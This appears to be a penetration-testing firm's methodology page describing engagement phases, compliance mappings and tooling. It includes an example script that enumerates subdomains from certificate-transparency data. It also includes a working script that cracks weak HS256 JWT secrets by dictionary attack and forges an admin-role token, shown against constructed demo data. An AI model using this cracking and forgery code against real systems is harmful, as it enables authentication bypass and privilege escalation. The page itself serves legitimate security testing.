Valtik Studios
How We Work

Our methodology

Six phases. Two weeks. Every finding verified by hand. Here's exactly what happens when you engage Valtik Studios.

01
Day 1

Scope & Authorization

We define exactly what gets tested, sign a permission letter, and set up secure communication channels. No scanning happens until authorization is confirmed.

Target domains & IP ranges
Signed permission letter on file
Emergency contact exchange
Secure reporting channel setup
02
Days 1-2

Reconnaissance

Passive and active recon to map your attack surface. Subdomain enumeration, service fingerprinting, technology stack identification, and exposed asset discovery.

DNS & subdomain enumeration
Certificate transparency logs
Technology stack fingerprinting
Exposed service inventory
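As an added illustration of the certificate-transparency step above (example code written for this page, not Valtik's tooling): a CT log search returns every certificate ever issued for a domain, so the raw names need normalising before they become a target list. The sample below is a hand-constructed record set in the shape crt.sh returns for a JSON query; it is not a real query result. The function lowercases names, strips wildcard prefixes (the base of `*.staging.example.com` is still a real hostname to probe), discards look-alike names outside the apex, and keeps hosts that only ever appeared on now-expired certificates as `expired` rather than dropping them, because decommissioned hosts that still resolve are exactly the exposed assets the inventory should catch.

```python
import json

# Constructed sample, modelled on the crt.sh JSON output shape
# (?q=%25.example.com&output=json). Hand-written for this example.
SAMPLE_CT_JSON = json.dumps([
    {"issuer_name": "C=US, O=Let's Encrypt, CN=R3",
     "name_value": "api.example.com\nwww.example.com",
     "not_after": "2025-01-01T00:00:00"},
    {"issuer_name": "C=US, O=Let's Encrypt, CN=R3",
     "name_value": "*.staging.example.com",
     "not_after": "2025-03-01T00:00:00"},
    {"issuer_name": "C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1",
     "name_value": "API.example.com",            # case variant of an existing host
     "not_after": "2023-01-01T00:00:00"},
    {"issuer_name": "C=US, O=Let's Encrypt, CN=R3",
     "name_value": "example.com.evil.net",       # out-of-scope look-alike
     "not_after": "2025-01-01T00:00:00"},
    {"issuer_name": "C=US, O=Let's Encrypt, CN=R3",
     "name_value": "old-vpn.example.com",        # only ever on an expired cert
     "not_after": "2020-01-01T00:00:00"},
    {"issuer_name": "C=US, O=Let's Encrypt, CN=R3",
     "name_value": "example.com"},               # no not_after field
])


def in_scope(host: str, apex: str) -> bool:
    """True only for the apex itself or a real subdomain of it."""
    return host == apex or host.endswith("." + apex)


def extract_hosts(ct_json: str, apex: str, now_iso: str) -> dict:
    """Return {hostname: 'active' | 'expired'} for in-scope names in a CT result.

    now_iso is an ISO-8601 timestamp string; crt.sh's not_after values are
    ISO-8601 too, so a plain string comparison orders them correctly.
    """
    status = {}
    for entry in json.loads(ct_json):
        not_after = entry.get("not_after")
        expired = not_after is not None and not_after < now_iso
        # name_value holds every SAN on the cert, newline-separated
        for raw in entry.get("name_value", "").split("\n"):
            name = raw.strip().lower().rstrip(".")
            if name.startswith("*."):
                name = name[2:]
            if not name or not in_scope(name, apex):
                continue
            # A host is active if any non-expired certificate names it
            if not expired or status.get(name) == "active":
                status[name] = "active"
            else:
                status[name] = "expired"
    return dict(sorted(status.items()))


if __name__ == "__main__":
    for host, state in extract_hosts(SAMPLE_CT_JSON, "example.com",
                                     "2024-06-01T00:00:00").items():
        print(f"{state:8} {host}")
```

The `expired` bucket is worth a second look during the exposed-service inventory: resolve each of those names and port-scan anything that still answers.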
03
Days 2-4

Automated Scanning

Our 34 platform-specific scanners run against your stack. Each scanner is built from real vulnerability research, not generic CVE databases.

34 platform-specific scanners
BaaS misconfiguration detection
Secret & credential scanning
Authentication flow analysis
04
Days 4-10

Manual Escalation

Every automated finding is manually verified and escalated. We chain vulnerabilities together, test business logic, and look for the things scanners miss.

Finding verification & triage
Vulnerability chaining
Business logic testing
Privilege escalation attempts
05
Days 10-12

Reporting

You receive two deliverables: a 1-page executive summary for leadership, and a full technical report with reproduction steps and fix commands.

Executive summary (1 page)
Technical report with repro steps
Severity-ranked findings
Remediation guidance per finding
06
Day 14 + 2 months

Walkthrough & Retest

30-minute call walking through every finding. After you fix things, we retest for free within two months to confirm the fixes hold.

30-minute walkthrough call
Q&A on all findings
Free retest within 60 days
Public verification certificate

Ready to see this in action?

Request a Quote
Compliance Framework Mapping

Our methodology maps to the frameworks your auditors check

PCI DSS 4.0

Requirement 11.4

Our engagements cover Requirement 11.4.1 (documented, industry-accepted methodology), 11.4.2 (internal penetration testing), 11.4.3 (external penetration testing), 11.4.4 (correction and retest of exploitable findings, via the included retest), and 11.4.5/11.4.6 (segmentation testing, where you rely on segmentation to reduce CDE scope). QSA-ready attestation letter included.

PCI DSS 4.0 Penetration Testing →
HIPAA Security Rule

45 CFR 164.308(a)(8)

Evaluation of security controls. Our engagements include risk analysis, technical safeguard review, and penetration testing of ePHI-handling systems. Aligned with the Security Rule update HHS proposed in its January 2025 NPRM, which would make annual penetration testing and semi-annual vulnerability scanning explicit requirements.

HIPAA Security Assessment →
SOC 2

Trust Services Criteria CC6, CC7

Findings map to Common Criteria CC6 (Logical and Physical Access) and CC7 (System Operations). Reports are structured to satisfy the documentation requirements that SOC 2 auditors apply during Type II review.

SOC 2 Readiness →
CMMC 2.0

NIST 800-171 CA.L2-3.12.1

Security assessments of CUI-handling systems. Readiness-only (we are not a C3PAO). Our work prepares you for the formal assessment.

CMMC 2.0 Readiness →
NYDFS 23 NYCRR 500

Section 500.05

Annual penetration testing from inside and outside the network boundary by a qualified independent party, plus vulnerability assessments (automated scans and manual review of systems the scans miss) at the frequency your risk assessment sets, as required by the November 2023 amendment. Reports suitable for NYDFS examiner review and the annual certification of compliance.

NYDFS Deep Dive →
ISO 27001:2022

Annex A.8.8, A.5.23, A.5.36

Management of technical vulnerabilities (A.8.8), information security for use of cloud services (A.5.23), and compliance with policies, rules and standards, including technical compliance reviews (A.5.36). Dual certification path alongside SOC 2.

ISO 27001 vs SOC 2 →
Standards Alignment

Built on recognized testing standards

NIST SP 800-115

Technical Guide to Information Security Testing and Assessment. The foundational US government guidance for penetration testing. Defines planning, discovery, attack, and reporting phases. Every engagement is documented against this reference.

OWASP Testing Guide v4.2

Web application testing methodology covering authentication, session management, input validation, business logic, client-side, and API testing. Primary reference for application security work.

OWASP API Security Top 10 (2023)

Current API-specific vulnerability categories including broken object-level authorization (BOLA), broken function-level authorization, improper inventory, and unsafe consumption of APIs.

PTES (Penetration Testing Execution Standard)

Seven-phase methodology: pre-engagement, intelligence gathering, threat modeling, vulnerability analysis, exploitation, post-exploitation, and reporting. One of the industry-accepted methodologies that PCI DSS 4.0 Requirement 11.4.1 requires testing to be based on.

MITRE ATT&CK

Adversary tactics, techniques, and procedures framework. Attack chains are documented against ATT&CK technique IDs so findings translate directly to detection engineering and threat hunting.

CIS Critical Security Controls

18 prioritized controls referenced in our remediation recommendations. Findings are mapped to the CIS Control they address so remediation fits into broader security program planning.

Tooling

Commercial, open source, and Valtik-built

We use industry-standard tools, not a single vendor's stack. Transparency matters — here is what actually runs during engagements.

Commercial

  • Burp Suite Professional
  • Commercial vulnerability scanners as required per engagement
  • Cloud-provider native security tooling (Amazon Inspector, Microsoft Defender for Cloud, Google Cloud Security Command Center)

Open Source

  • Nuclei, Nmap, FFuF
  • OWASP ZAP, sqlmap
  • Impacket, BloodHound
  • Trivy, Checkov, Semgrep
  • NetExec (the maintained CrackMapExec fork), Responder

Valtik-built

  • 34+ platform-specific scanners
  • BaaS detection & exploitation
  • JWT secret crackers
  • Nuclei template library
  • Custom exploit modules
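To make the "JWT secret crackers" line above and the authentication-flow analysis of phase 03 concrete, here is an added example of what such a tool does (written for this page; not Valtik's own code). HS256 tokens are signed with a shared secret, so a weak secret can be recovered offline by recomputing the HMAC over the token's header and payload for each candidate in a wordlist. Everything here is constructed: the token is minted inside the block by a hypothetical app using the weak secret `changeme`, and the wordlist is a five-entry stand-in for the real lists a tester would use. Once the secret is recovered, the same primitive lets the tester forge a token with elevated claims, which is the finding that actually goes in the report.

```python
import base64
import hashlib
import hmac
import json
from typing import Iterable, Optional


def b64url_decode(s: str) -> bytes:
    # JWT segments drop base64 padding; restore it before decoding
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def b64url_encode(b: bytes) -> str:
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()


def sign_hs256(header: dict, payload: dict, secret: bytes) -> str:
    """Mint an HS256 JWT (used here to build the constructed demo token)."""
    segments = [b64url_encode(json.dumps(part, separators=(",", ":")).encode())
                for part in (header, payload)]
    signing_input = ".".join(segments).encode()
    sig = hmac.new(secret, signing_input, hashlib.sha256).digest()
    return f"{signing_input.decode()}.{b64url_encode(sig)}"


def verify_hs256(token: str, secret: bytes) -> Optional[dict]:
    """Return the payload if the HS256 signature checks out, else None."""
    parts = token.split(".")
    if len(parts) != 3:
        return None
    header_b64, payload_b64, sig_b64 = parts
    header = json.loads(b64url_decode(header_b64))
    if header.get("alg") != "HS256":
        return None  # refuse to treat RS256/none tokens as HMAC-signed
    expected = hmac.new(secret, f"{header_b64}.{payload_b64}".encode(),
                        hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig_b64)):
        return None
    return json.loads(b64url_decode(payload_b64))


def crack_hs256(token: str, candidates: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack: return the first secret that reproduces the signature."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    if header.get("alg") != "HS256":
        raise ValueError(f"not an HS256 token (alg={header.get('alg')!r})")
    signing_input = f"{header_b64}.{payload_b64}".encode()
    target = b64url_decode(sig_b64)
    for cand in candidates:
        mac = hmac.new(cand.encode(), signing_input, hashlib.sha256).digest()
        if hmac.compare_digest(mac, target):
            return cand
    return None


def forge_with_secret(token: str, secret: str, **new_claims) -> str:
    """Re-sign the captured token with the recovered secret and altered claims."""
    header_b64, payload_b64, _ = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    payload = json.loads(b64url_decode(payload_b64))
    payload.update(new_claims)
    return sign_hs256(header, payload, secret.encode())


# Constructed demo data: a token from a hypothetical app with a weak secret,
# and a tiny stand-in wordlist. Not captured from any real system.
WEAK_SECRET = "changeme"
DEMO_TOKEN = sign_hs256({"alg": "HS256", "typ": "JWT"},
                        {"sub": "1234", "role": "user"},
                        WEAK_SECRET.encode())
WORDLIST = ["password", "secret", "jwt_secret", "changeme", "s3cr3t"]


if __name__ == "__main__":
    found = crack_hs256(DEMO_TOKEN, WORDLIST)
    print("recovered secret:", found)
    if found:
        admin = forge_with_secret(DEMO_TOKEN, found, role="admin")
        print("forged admin token verifies:", verify_hs256(admin, found.encode()))
```

Against a real target the candidate list would be a large wordlist and the loop would be the bottleneck; the point of the example is that nothing here touches the target, so the only defence is a secret with enough entropy that a dictionary never contains it (or moving to an asymmetric algorithm).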

Ready to start?

Free website security check. No obligation, no sales pitch. We scan your public surface and send a plain-English findings report in 48 hours.